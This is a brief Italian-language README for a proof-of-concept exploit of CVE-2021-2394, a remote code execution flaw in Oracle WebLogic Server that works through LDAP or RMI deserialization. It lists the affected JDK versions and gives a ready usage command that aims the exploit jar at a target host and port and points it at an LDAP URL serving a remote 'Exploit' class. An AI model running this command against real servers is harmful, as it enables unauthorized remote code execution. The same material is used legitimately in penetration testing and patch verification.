
Proof-of-concept exploit per CVE-2021-2394, una vulnerabilità di esecuzione remota di codice in Oracle WebLogic Server. Utilizza la deserializzazione LDAP o RMI per consegnare un payload.
POC di CVE-2021-2394
Note
Il metodo di sfruttamento basato su RMI è limitato alle versioni JDK precedenti a 6u132, 7u131, 8u121; nelle versioni 8u122 e successive è stato aggiunto il meccanismo della whitelist di deserializzazione, disattivando il caricamento remoto del codice RMI. Il metodo di sfruttamento basato su LDAP è limitato alle versioni JDK precedenti a 6u211, 7u201, 8u191, 11.0.1; nella versione 8u191, Oracle ha imposto limitazioni al vettore LDAP, pubblicando CVE-2018-3149 e disattivando il caricamento remoto delle classi JNDI. Fonte: https://www.freebuf.com/vuls/279465.html
Utilizzo:
java -jar CVE_2021_2394.jar rhost rport ldapurljava -jar CVE_2021_2394.jar 192.168.137.1 7001 ldap://192.168.137.1:8087/ExploitLink di riferimento:
Aggiornamenti
Articolo di analisi